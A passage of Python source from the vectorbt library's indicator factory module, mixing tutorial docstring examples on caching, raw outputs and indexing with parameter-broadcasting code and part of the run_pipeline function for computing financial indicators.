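...     # close is now a 2-dim DataFrame; process one column at a time
...     return pd.concat([
...         ta.ema(close.iloc[:, i], length=ema_len)
...         for i in range(close.shape[1])
...     ], axis=1)
>>> MyInd2d = vbt.IndicatorFactory(
...     input_names=['close'],
...     param_names=['ema_len'],
...     output_names=['ema']
... ).from_apply_func(apply_func, keep_pd=True, to_2d=True)
```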
!!! hint
    Writing native Numba-compiled code may provide performance that is magnitudes higher
    than that offered by libraries that work on pandas.
## Raw outputs and caching
`IndicatorFactory` re-uses calculation artifacts whenever possible. Since it was originally designed
for hyperparameter optimization, where the same parameter values often get repeated,
avoiding re-processing of identical parameter combinations is essential for good performance.
For instance, when the `run_combs` method is being used and `speedup` is set to True, it first calculates
the raw outputs of all unique parameter combinations and then uses them to build outputs for
the whole parameter grid.
Let's first take a look at a typical raw output by setting `return_raw` to True:
```python-repl
>>> raw = vbt.MA.run(price, 2, [False, True], return_raw=True)
>>> raw
([array([[ nan, nan, nan, nan],
[1.5 , 4.5 , 1.66666667, 4.33333333],
[2.5 , 3.5 , 2.55555556, 3.44444444],
[3.5 , 2.5 , 3.51851852, 2.48148148],
[4.5 , 1.5 , 4.50617284, 1.49382716]])],
[(2, False), (2, True)],
2,
[])
```
It consists of a list of the returned output arrays, a list of the zipped parameter combinations,
the number of input columns, and other objects returned along with output arrays but not listed
in `output_names`. The next time we decide to run the indicator on a subset of the parameters above,
we can simply pass this tuple as the `use_raw` argument. This won't call the calculation function and
will throw an error if some of the requested parameter combinations cannot be found in `raw`.
```python-repl
>>> vbt.MA.run(price, 2, True, use_raw=raw).ma
ma_window 2
ma_ewm True
a b
2020-01-01 NaN NaN
2020-01-02 1.666667 4.333333
2020-01-03 2.555556 3.444444
2020-01-04 3.518519 2.481481
2020-01-05 4.506173 1.493827
```
Here is how the performance compares when repeatedly running the same parameter combination
with and without speedup:
```python-repl
>>> a = np.random.uniform(size=(1000,))
>>> %timeit vbt.MA.run(a, np.full(1000, 2), speedup=False)
73.4 ms ± 4.76 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)
>>> %timeit vbt.MA.run(a, np.full(1000, 2), speedup=True)
8.99 ms ± 114 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)
```
!!! note
`speedup` is disabled by default.
Enable `speedup` if input arrays have few columns and there are tons of repeated parameter combinations.
Disable `speedup` if input arrays are very wide, if two identical parameter combinations can lead to
different results, or when requesting raw output, cache, or additional outputs outside of `output_names`.
Another performance enhancement can be introduced by caching, which has to be implemented by the user.
The class method `IndicatorFactory.from_apply_func` has an argument `cache_func`, which is called
prior to the main calculation.
Consider the following scenario: we want to compute the relative distance between two expensive
rolling windows. We have already decided on the value for the first window, and want to test
thousands of values for the second window. Without caching, and even with `speedup` enabled,
the first rolling window will be re-calculated over and over again and waste our resources:
```python-repl
>>> @njit
... def roll_mean_expensive_nb(price, w):
... for i in range(100):
... out = vbt.nb.rolling_mean_nb(price, w)
... return out
>>> @njit
... def apply_func_nb(price, w1, w2):
... roll_mean1 = roll_mean_expensive_nb(price, w1)
... roll_mean2 = roll_mean_expensive_nb(price, w2)
... return (roll_mean2 - roll_mean1) / roll_mean1
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['w1', 'w2'],
... output_names=['output'],
... ).from_apply_func(apply_func_nb)
>>> MyInd.run(price, 2, 3).output
custom_w1 2
custom_w2 3
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 -0.200000 0.142857
2020-01-04 -0.142857 0.200000
2020-01-05 -0.111111 0.333333
>>> %timeit MyInd.run(price, 2, np.arange(2, 1000))
264 ms ± 3.22 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)
```
To avoid this, let's cache all unique rolling windows:
```python-repl
>>> @njit
... def cache_func_nb(price, ws1, ws2):
... cache_dict = dict()
... ws = ws1.copy()
... ws.extend(ws2)
... for i in range(len(ws)):
... h = hash((ws[i]))
... if h not in cache_dict:
... cache_dict[h] = roll_mean_expensive_nb(price, ws[i])
... return cache_dict
>>> @njit
... def apply_func_nb(price, w1, w2, cache_dict):
... return (cache_dict[hash(w2)] - cache_dict[hash(w1)]) / cache_dict[hash(w1)]
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['w1', 'w2'],
... output_names=['output'],
... ).from_apply_func(apply_func_nb, cache_func=cache_func_nb)
>>> MyInd.run(price, 2, 3).output
custom_w1 2
custom_w2 3
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 -0.200000 0.142857
2020-01-04 -0.142857 0.200000
2020-01-05 -0.111111 0.333333
>>> %timeit MyInd.run(price, 2, np.arange(2, 1000))
145 ms ± 4.55 ms per loop (mean ± std. dev. of 7 runs, 10 loops each)
```
We have cut down the processing time almost in half.
Similar to raw outputs, we can force `IndicatorFactory` to return the cache, so it can be used
in other calculations or even indicators. The clear advantage of this approach is that we don't
rely on some fixed set of parameter combinations anymore, but on the values of each parameter,
which gives us more granularity in managing performance.
```python-repl
>>> cache = MyInd.run(price, 2, np.arange(2, 1000), return_cache=True)
>>> %timeit MyInd.run(price, np.arange(2, 1000), np.arange(2, 1000), use_cache=cache)
30.1 ms ± 2 ms per loop (mean ± std. dev. of 7 runs, 10 loops each)
```
## Custom properties and methods
Use the `custom_output_props` argument when constructing an indicator to define lazy outputs -
outputs that are processed only when explicitly called. They will become cached properties
and, in contrast to regular outputs, they can have an arbitrary shape. For example, let's
attach a property that will calculate the distance between the moving average and the price.
```python-repl
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window'],
... output_names=['ma'],
... custom_output_props=dict(distance=lambda self: (self.price - self.ma) / self.ma)
... ).from_apply_func(vbt.nb.rolling_mean_nb)
>>> MyInd.run(price, [2, 3]).distance
custom_window 2 3
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 0.333333 -0.111111 NaN NaN
2020-01-03 0.200000 -0.142857 0.500000 -0.250000
2020-01-04 0.142857 -0.200000 0.333333 -0.333333
2020-01-05 0.111111 -0.333333 0.250000 -0.500000
```
Another way of defining your own properties and methods is subclassing:
```python-repl
>>> class MyIndExtended(MyInd):
... def plot(self, column=None, **kwargs):
... self_col = self.select_series(column=column, group_by=False)
...         return self_col.ma.vbt.plot(**kwargs)
>>> MyIndExtended.run(price, [2, 3])[(2, 'a')].plot()
```

## Helper properties and methods
For each name in `input_names`, `in_output_names`, `output_names`, and `custom_output_props`,
`IndicatorFactory` will create a number of comparison and combination methods, such as for generating signals.
What kind of methods are created can be regulated using `dtype` in the `attr_settings` dictionary.
```python-repl
>>> from collections import namedtuple
>>> MyEnum = namedtuple('MyEnum', ['one', 'two'])(0, 1)
>>> def apply_func_nb(price):
... out_float = np.empty(price.shape, dtype=np.float_)
... out_bool = np.empty(price.shape, dtype=np.bool_)
... out_enum = np.empty(price.shape, dtype=np.int_)
... return out_float, out_bool, out_enum
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... output_names=['out_float', 'out_bool', 'out_enum'],
... attr_settings=dict(
... out_float=dict(dtype=np.float_),
... out_bool=dict(dtype=np.bool_),
... out_enum=dict(dtype=MyEnum)
... )).from_apply_func(apply_func_nb)
>>> myind = MyInd.run(price)
>>> dir(myind)
[
...
'out_bool',
'out_bool_and',
'out_bool_or',
'out_bool_xor',
'out_enum',
'out_enum_readable',
'out_float',
'out_float_above',
'out_float_below',
'out_float_equal',
...
'price',
'price_above',
'price_below',
'price_equal',
...
]
```
Each of these methods and properties is created for sheer convenience: to easily combine
boolean arrays using logical rules and to compare numeric arrays. All operations are done
strictly using NumPy. Another advantage is utilization of vectorbt's own broadcasting, such
that one can combine inputs and outputs with an arbitrary array-like object, given their
shapes can broadcast together.
We can also do comparison with multiple objects at once by passing them as a tuple/list:
```python-repl
>>> myind.price_above([1.5, 2.5])
custom_price_above 1.5 2.5
a b a b
2020-01-01 False True False True
2020-01-02 True True False True
2020-01-03 True True True True
2020-01-04 True True True False
2020-01-05 True False True False
```
## Indexing
`IndicatorFactory` attaches pandas indexing to the indicator class thanks to
`vectorbt.base.array_wrapper.ArrayWrapper`. Supported are `iloc`, `loc`,
`*param_name*_loc`, `xs`, and `__getitem__`.
This makes it possible to access rows and columns by labels, integer positions, and parameters.
```python-repl
>>> ma = vbt.MA.run(price, [2, 3])
>>> ma[(2, 'b')]
<vectorbt.indicators.basic.MA at 0x7fe4d10ddcc0>
>>> ma[(2, 'b')].ma
2020-01-01 NaN
2020-01-02 4.5
2020-01-03 3.5
2020-01-04 2.5
2020-01-05 1.5
Name: (2, b), dtype: float64
>>> ma.window_loc[2].ma
a b
2020-01-01 NaN NaN
2020-01-02 1.5 4.5
2020-01-03 2.5 3.5
2020-01-04 3.5 2.5
2020-01-05 4.5 1.5
```
## TA-Lib
The indicator factory also provides the class method `IndicatorFactory.from_talib`,
which can be used to wrap any function from TA-Lib. It automatically fills in all the
necessary information, such as input, parameter, and output names.
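For example, a quick sketch (assuming TA-Lib is installed; the exact column labels follow
the function's TA-Lib metadata):

```python-repl
>>> SMA = vbt.IndicatorFactory.from_talib('SMA')
>>> SMA.run(price, timeperiod=[2, 3]).real
sma_timeperiod    2         3
                  a    b    a    b
2020-01-01      NaN  NaN  NaN  NaN
2020-01-02      1.5  4.5  NaN  NaN
2020-01-03      2.5  3.5  2.0  4.0
2020-01-04      3.5  2.5  3.0  3.0
2020-01-05      4.5  1.5  4.0  2.0
```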
"""
import numpy as np
import pandas as pd
from numba import njit
from numba.typed import List
import itertools
import inspect
from collections import OrderedDict
import warnings
from vectorbt.utils import checks
from vectorbt.utils.decorators import classproperty, cached_property
from vectorbt.utils.config import merge_dicts
from vectorbt.utils.random import set_seed
from vectorbt.utils.params import (
to_typed_list,
broadcast_params,
create_param_product,
DefaultParam
)
from vectorbt.utils.enum import convert_str_enum_value
from vectorbt.base import index_fns, reshape_fns, combine_fns
from vectorbt.base.indexing import ParamIndexerFactory
from vectorbt.base.array_wrapper import ArrayWrapper, Wrapping
def params_to_list(params, is_tuple, is_array_like):
"""Cast parameters to a list."""
check_against = [list, List]
if not is_tuple:
check_against.append(tuple)
if not is_array_like:
check_against.append(np.ndarray)
check_against = tuple(check_against)
if isinstance(params, check_against):
new_params = list(params)
else:
new_params = [params]
return new_params
def prepare_params(param_list, param_settings, input_shape=None, to_2d=False):
"""Prepare parameters."""
new_param_list = []
for i, params in enumerate(param_list):
_param_settings = param_settings if isinstance(param_settings, dict) else param_settings[i]
is_tuple = _param_settings.get('is_tuple', False)
dtype = _param_settings.get('dtype', None)
if checks.is_namedtuple(dtype):
params = convert_str_enum_value(dtype, params)
is_array_like = _param_settings.get('is_array_like', False)
bc_to_input = _param_settings.get('bc_to_input', False)
broadcast_kwargs = _param_settings.get('broadcast_kwargs', dict(require_kwargs=dict(requirements='W')))
new_params = params_to_list(params, is_tuple, is_array_like)
if bc_to_input is not False:
# Broadcast to input or its axis
if is_tuple:
raise ValueError("Tuples cannot be broadcast to input")
if input_shape is None:
raise ValueError("Cannot broadcast to input if input shape is unknown. Pass input_shape.")
if bc_to_input is True:
to_shape = input_shape
else:
checks.assert_in(bc_to_input, (0, 1))
# Note that input_shape can be 1D
if bc_to_input == 0:
to_shape = input_shape[0]
else:
to_shape = input_shape[1] if len(input_shape) > 1 else (1,)
_new_params = reshape_fns.broadcast(
*new_params,
to_shape=to_shape,
**broadcast_kwargs
)
if len(new_params) == 1:
_new_params = (_new_params,)
if to_2d and bc_to_input is True:
# If inputs are meant to reshape to 2D, do the same to parameters
# But only to those that fully resemble inputs (= not raw)
__new_params = list(_new_params)
for j, param in enumerate(__new_params):
keep_raw = broadcast_kwargs.get('keep_raw', False)
if keep_raw is False or (isinstance(keep_raw, (tuple, list)) and not keep_raw[j]):
__new_params[j] = reshape_fns.to_2d(param)
new_params = __new_params
else:
new_params = _new_params
new_param_list.append(new_params)
return new_param_list
def build_columns(param_list, input_columns, level_names=None, hide_levels=None,
param_settings=None, per_column=False, ignore_default=False, **kwargs):
"""For each parameter in `param_list`, create a new column level with parameter values
and stack it on top of `input_columns`.
Returns a list of parameter indexes and new columns."""
if level_names is not None:
checks.assert_len_equal(param_list, level_names)
if hide_levels is None:
hide_levels = []
if param_settings is None:
param_settings = {}
param_indexes = []
shown_param_indexes = []
for i in range(len(param_list)):
params = param_list[i]
level_name = None
if level_names is not None:
level_name = level_names[i]
if per_column:
param_index = index_fns.index_from_values(params, name=level_name)
else:
_param_settings = param_settings if isinstance(param_settings, dict) else param_settings[i]
_per_column = _param_settings.get('per_column', False)
if _per_column:
param_index = None
for param in params:
bc_param = np.broadcast_to(param, len(input_columns))
_param_index = index_fns.index_from_values(bc_param, name=level_name)
if param_index is None:
param_index = _param_index
else:
param_index = param_index.append(_param_index)
if len(param_index) == 1 and len(input_columns) > 1:
# When using flexible column-wise parameters
param_index = index_fns.repeat_index(
param_index,
len(input_columns),
ignore_default=ignore_default
)
else:
param_index = index_fns.index_from_values(param_list[i], name=level_name)
param_index = index_fns.repeat_index(
param_index,
len(input_columns),
ignore_default=ignore_default
)
param_indexes.append(param_index)
if i not in hide_levels:
shown_param_indexes.append(param_index)
if len(shown_param_indexes) > 0:
if not per_column:
n_param_values = len(param_list[0]) if len(param_list) > 0 else 1
input_columns = index_fns.tile_index(
input_columns,
n_param_values,
ignore_default=ignore_default
)
stacked_columns = index_fns.stack_indexes([*shown_param_indexes, input_columns], **kwargs)
return param_indexes, stacked_columns
return param_indexes, input_columns
def run_pipeline(
num_ret_outputs,
custom_func,
*args,
require_input_shape=False,
input_shape=None,
input_index=None,
input_columns=None,
input_list=None,
in_output_list=None,
in_output_settings=None,
broadcast_kwargs=None,
param_list=None,
param_product=False,
param_settings=None,
speedup=False,
silence_warnings=False,
per_column=False,
pass_col=False,
keep_pd=False,
to_2d=True,
as_lists=False,
pass_input_shape=False,
pass_flex_2d=False,
level_names=None,
hide_levels=None,
stacking_kwargs=None,
return_raw=False,
use_raw=None,
wrapper_kwargs=None,
seed=None,
**kwargs):
"""A pipeline for running an indicator, used by `IndicatorFactory`.
Args:
num_ret_outputs (int): The number of output arrays returned by `custom_func`.
custom_func (callable): A custom calculation function.
See `IndicatorFactory.from_custom_func`.
*args: Arguments passed to the `custom_func`.
        require_input_shape (bool): Whether the input shape is required.
Will set `pass_input_shape` to True and raise an error if `input_shape` is None.
input_shape (tuple): Shape to broadcast each input to.
Can be passed to `custom_func`. See `pass_input_shape`.
input_index (any): Sets index of each input.
Can be used to label index if no inputs passed.
input_columns (any): Sets columns of each input.
Can be used to label columns if no inputs passed.
input_list (list of array_like): A list of input arrays.
in_output_list (list of array_like): A list of in-place output arrays.
If an array should be generated, pass None.
in_output_settings (dict or list of dict): Settings corresponding to each in-place output.
Following keys are accepted:
* `dtype`: Create this array using this data type and `np.empty`. Default is None.
broadcast_kwargs (dict): Keyword arguments passed to `vectorbt.base.reshape_fns.broadcast`
to broadcast inputs.
param_list (list of array_like): A list of parameters.
Each element is either an array-like object or a single value of any type.
param_product (bool): Whether to build a Cartesian product out of all parameters.
param_settings (dict or list of dict): Settings corresponding to each parameter.
Following keys are accepted:
            * `dtype`: If the data type is an enumerated type and a string was passed as the
                parameter value, it will be converted to an integer first.
* `is_tuple`: If tuple was passed, it will be considered as a single value.
To treat it as multiple values, pack it into a list.
* `is_array_like`: If array-like object was passed, it will be considered as a single value.
To treat it as multiple values, pack it into a list.
* `bc_to_input`: Whether to broadcast parameter to input size. You can also broadcast
parameter to an axis by passing an integer.
* `broadcast_kwargs`: Keyword arguments passed to `vectorbt.base.reshape_fns.broadcast`.
* `per_column`: Whether each parameter value can be split per column such that it can
be better reflected in a multi-index. Does not affect broadcasting.
speedup (bool): Whether to run only on unique parameter combinations.
Disable if two identical parameter combinations can lead to different results
(e.g., due to randomness) or if inputs are large and `custom_func` is fast.
!!! note
Cache, raw output, and output objects outside of `num_ret_outputs` will be returned
for unique parameter combinations only.
silence_warnings (bool): Whether to hide warnings such as coming from `speedup`.
per_column (bool): Whether to split the DataFrame into Series, one per column, and run `custom_func`
on each Series.
Each list of parameter values will be broadcast to the number of columns and
each parameter value will be applied per Series rather than per DataFrame.
Input shape must be known beforehand.
pass_col (bool): Whether to pass column index as keyword argument if `per_column` is set to True.
keep_pd (bool): Whether to keep inputs as pandas objects, otherwise convert to NumPy arrays.
to_2d (bool): Whether to reshape inputs to 2-dim arrays, otherwise keep as-is.
as_lists (bool): Whether to pass inputs and parameters to `custom_func` as lists.
If `custom_func` is Numba-compiled, passes tuples.
pass_input_shape (bool): Whether to pass `input_shape` to `custom_func` as keyword argument.
pass_flex_2d (bool): Whether to pass `flex_2d` to `custom_func` as keyword argument.
level_names (list of str): A list of column level names corresponding to each parameter.
Should have the same length as `param_list`.
hide_levels (list): A list of indices of parameter levels to hide.
stacking_kwargs (dict): Keyword arguments passed to `vectorbt.base.index_fns.repeat_index`,
`vectorbt.base.index_fns.tile_index`, and `vectorbt.base.index_fns.stack_indexes`
when stacking parameter and input column levels.
return_raw (bool): Whether to return raw output without post-processing and hashed parameter tuples.
        use_raw (tuple): Takes the raw results of a previous run and uses them instead of running `custom_func`.
wrapper_kwargs (dict): Keyword arguments passed to `vectorbt.base.array_wrapper.ArrayWrapper`.
seed (int): Set seed to make output deterministic.
**kwargs: Keyword arguments passed to the `custom_func`.
Some common arguments include `return_cache` to return cache and `use_cache` to use cache.
Those are only applicable to `custom_func` that supports it (`custom_func` created using
`IndicatorFactory.from_apply_func` are supported by default).
Returns:
Array wrapper, list of inputs (`np.ndarray`), input mapper (`np.ndarray`), list of outputs
(`np.ndarray`), list of parameter arrays (`np.ndarray`), list of parameter mappers (`np.ndarray`),
list of outputs that are outside of `num_ret_outputs`.
## Explanation
Here is a subset of tasks that the function `run_pipeline` does:
* Takes one or multiple array objects in `input_list` and broadcasts them.
```python-repl
>>> sr = pd.Series([1, 2], index=['x', 'y'])
>>> df = pd.DataFrame([[3, 4], [5, 6]], index=['x', 'y'], columns=['a', 'b'])
>>> input_list = vbt.base.reshape_fns.broadcast(sr, df)
>>> input_list[0]
a b
x 1 1
y 2 2
>>> input_list[1]
a b
x 3 4
y 5 6
```
* Takes one or multiple parameters in `param_list`, converts them to NumPy arrays and
broadcasts them.
```python-repl
>>> p1, p2, p3 = 1, [2, 3, 4], [False]
>>> param_list = vbt.base.reshape_fns.broadcast(p1, p2, p3)
>>> param_list[0]
array([1, 1, 1])
>>> param_list[1]
array([2, 3, 4])
>>> param_list[2]
array([False, False, False])
```
* Performs calculation using `custom_func` to build output arrays (`output_list`) and
other objects (`other_list`, optionally).
```python-repl
>>> def custom_func(ts1, ts2, p1, p2, p3, *args, **kwargs):
... return np.hstack((
... ts1 + ts2 + p1[0] * p2[0],
... ts1 + ts2 + p1[1] * p2[1],
... ts1 + ts2 + p1[2] * p2[2],
... ))
>>> output = custom_func(*input_list, *param_list)
>>> output
array([[ 6, 7, 7, 8, 8, 9],
[ 9, 10, 10, 11, 11, 12]])
```
* Creates new column hierarchy based on parameters and level names.
```python-repl
>>> p1_columns = pd.Index(param_list[0], name='p1')
>>> p2_columns = pd.Index(param_list[1], name='p2')
>>> p3_columns = pd.Index(param_list[2], name='p3')
>>> p_columns = vbt.base.index_fns.stack_indexes([p1_columns, p2_columns, p3_columns])
>>> new_columns = vbt.base.index_fns.combine_indexes([p_columns, input_list[0].columns])
>>> output_df = pd.DataFrame(output, columns=new_columns)
>>> output_df
p1 1
p2 2 3 4
p3 False False False False False False
a b a b a b
0 6 7 7 8 8 9
1 9 10 10 11 11 12
```
* Broadcasts objects in `input_list` to match the shape of objects in `output_list` through tiling.
This is done to be able to compare them and generate signals, since we cannot compare NumPy
arrays that have totally different shapes, such as (2, 2) and (2, 6).
```python-repl
>>> new_input_list = [
... input_list[0].vbt.tile(len(param_list[0]), keys=p_columns),
... input_list[1].vbt.tile(len(param_list[0]), keys=p_columns)
... ]
>>> new_input_list[0]
p1 1
p2 2 3 4
p3 False False False False False False
a b a b a b
0 1 1 1 1 1 1
1 2 2 2 2 2 2
```
* Builds parameter mappers that will link parameters from `param_list` to columns in
`input_list` and `output_list`. This is done to enable column indexing using parameter values.
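    A sketch of such a mapper for two input columns and three parameter combinations:

    ```python-repl
    >>> input_mapper = np.tile(np.arange(2), 3)
    >>> input_mapper
    array([0, 1, 0, 1, 0, 1])
    ```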
"""
if require_input_shape:
checks.assert_not_none(input_shape)
pass_input_shape = True
if input_list is None:
input_list = []
if in_output_list is None:
in_output_list = []
if in_output_settings is None:
in_output_settings = {}
in_output_settings_keys = ['dtype']
if isinstance(in_output_settings, dict):
checks.assert_dict_valid(in_output_settings, [in_output_settings_keys])
else:
for _in_output_settings in in_output_settings:
checks.assert_dict_valid(_in_output_settings, [in_output_settings_keys])
if broadcast_kwargs is None:
broadcast_kwargs = {}
if param_list is None:
param_list = []
if param_settings is None:
param_settings = {}
param_settings_keys = [
'dtype',
'is_tuple',
'is_array_like',
'bc_to_input',
'broadcast_kwargs',
'per_column'
]
if isinstance(param_settings, dict):
checks.assert_dict_valid(param_settings, [param_settings_keys])
else:
for _param_settings in param_settings:
checks.assert_dict_valid(_param_settings, [param_settings_keys])
if hide_levels is None:
hide_levels = []
if stacking_kwargs is None:
stacking_kwargs = {}
if wrapper_kwargs is None:
wrapper_kwargs = {}
if keep_pd and checks.is_numba_func(custom_func):
raise ValueError("Cannot pass pandas objects to a Numba-compiled custom_func. Set keep_pd to False.")
in_output_idxs = [i for i, x in enumerate(in_output_list) if x is not None]
if len(in_output_idxs) > 0:
# In-place outputs should broadcast together with inputs
input_list += [in_output_list[i] for i in in_output_idxs]
if len(input_list) > 0:
# Broadcast inputs
if input_index is None:
input_index = 'default'
if input_columns is None:
input_columns = 'default'
# If input_shape is provided, will broadcast all inputs to this shape
broadcast_kwargs = merge_dicts(dict(
to_shape=input_shape,
index_from=input_index,
columns_from=input_columns
), broadcast_kwargs)
bc_input_list, input_shape, input_index, input_columns = reshape_fns.broadcast(
*input_list,
return_meta=True,
**broadcast_kwargs
)
if len(input_list) == 1:
bc_input_list = (bc_input_list,)
input_list = list(map(np.asarray, bc_input_list))
bc_in_output_list = []
if len(in_output_idxs) > 0:
# Separate inputs and in-place outputs
bc_in_output_list = input_list[-len(in_output_idxs):]
input_list = input_list[:-len(in_output_idxs)]
# Reshape input shape
if input_shape is not None and not isinstance(input_shape, tuple):
input_shape = (input_shape,)
# Keep original input_shape for per_column=True
orig_input_shape = input_shape
orig_input_shape_2d = input_shape
if input_shape is not None:
orig_input_shape_2d = input_shape if len(input_shape) > 1 else (input_shape[0], 1)
if per_column:
# input_shape is now the size of one column
if input_shape is None:
raise ValueError("input_shape is required when per_column=True")
input_shape = (input_shape[0],)
input_shape_ready = input_shape
input_shape_2d = input_shape
if input_shape is not None:
input_shape_2d = input_shape if len(input_shape) > 1 else (input_shape[0], 1)
if to_2d:
if input_shape is not None:
input_shape_ready = input_shape_2d # ready for custom_func
# Prepare parameters
# NOTE: input_shape instead of input_shape_ready since parameters should
# broadcast by the same rules as inputs
param_list = prepare_params(param_list, param_settings, input_shape=input_shape, to_2d=to_2d)
if len(param_list) > 1:
# Check level names
checks.assert_type(level_names, (list, tuple))
checks.assert_len_equal(param_list, level_names)
# Columns should be free of the specified level names
if input_columns is not None:
for level_name in level_names:
if level_name is not None:
checks.assert_level_not_exists(input_columns, level_name)
if param_product:
# Make Cartesian product out of all params
param_list = create_param_product(param_list)
if len(param_list) > 0:
# Broadcast such that each array has the same length
if per_column:
# The number of parameters should match the number of columns before split
param_list = broadcast_params(param_list, to_n=orig_input_shape_2d[1])
else:
param_list = broadcast_params(param_list)
n_param_values = len(param_list[0]) if len(param_list) > 0 else 1
use_speedup = False
param_list_unique = param_list
if not per_column and speedup:
try:
# Try to get all unique parameter combinations
param_tuples = list(zip(*param_list))
unique_param_tuples = list(OrderedDict.fromkeys(param_tuples).keys())
if len(unique_param_tuples) < len(param_tuples):
param_list_unique = list(map(list, zip(*unique_param_tuples)))
use_speedup = True
        except Exception:
            pass
if checks.is_numba_func(custom_func):
# Numba can't stand untyped lists
param_list_ready = [to_typed_list(params) for params in param_list_unique]
else:
param_list_ready = param_list_unique
n_unique_param_values = len(param_list_unique[0]) if len(param_list_unique) > 0 else 1
# Prepare inputs
if per_column:
# Split each input into Series/1-dim arrays, one per column
input_list_ready = []
for input in input_list:
input_2d = reshape_fns.to_2d(input)
col_inputs = []
for i in range(input_2d.shape[1]):
if to_2d:
col_input = input_2d[:, [i]]
else:
col_input = input_2d[:, i]
if keep_pd:
# Keep as pandas object
col_input = ArrayWrapper(input_index, input_columns[[i]], col_input.ndim).wrap(col_input)
col_inputs.append(col_input)
input_list_ready.append(col_inputs)
else:
input_list_ready = []
for input in input_list:
new_input = input
if to_2d:
new_input = reshape_fns.to_2d(input)
if keep_pd:
# Keep as pandas object
new_input = ArrayWrapper(input_index, input_columns, new_input.ndim).wrap(new_input)
input_list_ready.append(new_input)
# Prepare in-place outputs
in_output_list_ready = []
j = 0
for i in range(len(in_output_list)):
if input_shape_2d is None:
raise ValueError("input_shape is required when using in-place outputs")
if i in in_output_idxs:
# This in-place output has been already broadcast with inputs
in_output_wide = np.require(bc_in_output_list[j], requirements='W')
if not per_column:
# One per parameter combination
in_output_wide = reshape_fns.tile(in_output_wide, n_unique_param_values, axis=1)
j += 1
else:
# This in-place output hasn't been provided, so create empty
_in_output_settings = in_output_settings if isinstance(in_output_settings, dict) else in_output_settings[i]
dtype = _in_output_settings.get('dtype', None)
in_output_shape = (input_shape_2d[0], input_shape_2d[1] * n_unique_param_values)
in_output_wide = np.empty(in_output_shape, dtype=dtype)
in_output_list[i] = in_output_wide
in_outputs = []
# Split each in-place output into chunks, each of input shape, and append to a list
for i in range(n_unique_param_values):
in_output = in_output_wide[:, i * input_shape_2d[1]: (i + 1) * input_shape_2d[1]]
if len(input_shape_ready) == 1:
in_output = in_output[:, 0]
if keep_pd:
if per_column:
in_output = ArrayWrapper(input_index, input_columns[[i]], in_output.ndim).wrap(in_output)
else:
in_output = ArrayWrapper(input_index, input_columns, in_output.ndim).wrap(in_output)
in_outputs.append(in_output)
in_output_list_ready.append(in_outputs)
if checks.is_numba_func(custom_func):
# Numba can't stand untyped lists
in_output_list_ready = [to_typed_list(in_outputs) for in_outputs in in_output_list_ready]
def _use_raw(_raw):
# Use raw results of previous run to build outputs
_output_list, _param_map, _n_input_cols, _other_list = _raw
idxs = np.array([_param_map.index(param_tuple) for param_tuple in zip(*param_list)])
_output_list = [
np.hstack([o[:, idx * _n_input_cols:(idx + 1) * _n_input_cols] for idx in idxs])
for o in _output_list
]
return _output_list, _param_map, _n_input_cols, _other_list
# Get raw results
if use_raw is not None:
# Use raw results of previous run to build outputs
output_list, param_map, n_input_cols, other_list = _use_raw(use_raw)
else:
# Prepare other arguments
func_args = args
func_kwargs = {}
if pass_input_shape:
func_kwargs['input_shape'] = input_shape_ready
if pass_flex_2d:
if input_shape is None:
raise ValueError("Cannot determine flex_2d without inputs")
func_kwargs['flex_2d'] = len(input_shape) == 2
func_kwargs = merge_dicts(func_kwargs, kwargs)
# Set seed
if seed is not None:
set_seed(seed)
def _call_custom_func(_input_list_ready, _in_output_list_ready, _param_list_ready, *_func_args, **_func_kwargs):
# Run the function
if as_lists:
if checks.is_numba_func(custom_func):
return custom_func(
tuple(_input_list_ready),
tuple(_in_output_list_ready),
tuple(_param_list_ready),
*_func_args, **_func_kwargs
)
return custom_func(
_input_list_ready,
_in_output_list_ready,
_param_list_ready,
*_func_args, **_func_kwargs
)
return custom_func(
*_input_list_ready,
*_in_output_list_ready,
*_param_list_ready,
*_func_args, **_func_kwargs
)
if per_column:
output = []
for col in range(orig_input_shape_2d[1]):
# Select the column of each input and in-place output, and the respective parameter combination
_input_list_ready = []
for _inputs in input_list_ready:
# Each input array is now one column wide
_input_list_ready.append(_inputs[col])
_in_output_list_ready = []
for _in_outputs in in_output_list_ready:
# Each in-output array is now one column wide
if isinstance(_in_outputs, List):
__in_outputs = List()
else:
__in_outputs = []
__in_outputs.append(_in_outputs[col])
_in_output_list_ready.append(__in_outputs)
_param_list_ready = []
for _params in param_list_ready:
# Each parameter list is now one element long
if isinstance(_params, List):
__params = List()
else:
__params = []
__params.append(_params[col])
_param_list_ready.append(__params)
_func_args = func_args
_func_kwargs = func_kwargs.copy()
if 'use_cache' in func_kwargs:
use_cache = func_kwargs['use_cache']
if isinstance(use_cache, list) and len(use_cache) == orig_input_shape_2d[1]:
# Pass cache for this column
_func_kwargs['use_cache'] = func_kwargs['use_cache'][col]
if pass_col:
_func_kwargs['col'] = col
col_output = _call_custom_func(
_input_list_ready,
_in_output_list_ready,
_param_list_ready,
*_func_args,
**_func_kwargs
)
output.append(col_output)
else:
output = _call_custom_func(
input_list_ready,
in_output_list_ready,
param_list_ready,
*func_args,
**func_kwargs
)
# Return cache
if kwargs.get('return_cache', False):
if use_speedup and not silence_warnings:
warnings.warn("Cache is produced by unique parameter "
"combinations when speedup=True", stacklevel=2)
return output
def _split_output(output):
# Post-process results
if output is None:
_output_list = []
_other_list = []
else:
if isinstance(output, (tuple, list, List)):
_output_list = list(output)
else:
_output_list = [output]
# Other outputs should be returned without post-processing (for example cache_dict)
if len(_output_list) > num_ret_outputs:
_other_list = _output_list[num_ret_outputs:]
if use_speedup and not silence_warnings:
warnings.warn("Additional output objects are produced by unique parameter "
"combinations when speedup=True", stacklevel=2)
else:
_other_list = []
# Process only the num_ret_outputs outputs
_output_list = _output_list[:num_ret_outputs]
if len(_output_list) != num_ret_outputs:
raise ValueError("Number of returned outputs other than expected")
_output_list = list(map(lambda x: reshape_fns.to_2d(x, raw=True), _output_list))
return _output_list, _other_list
if per_column:
output_list = []
other_list = []
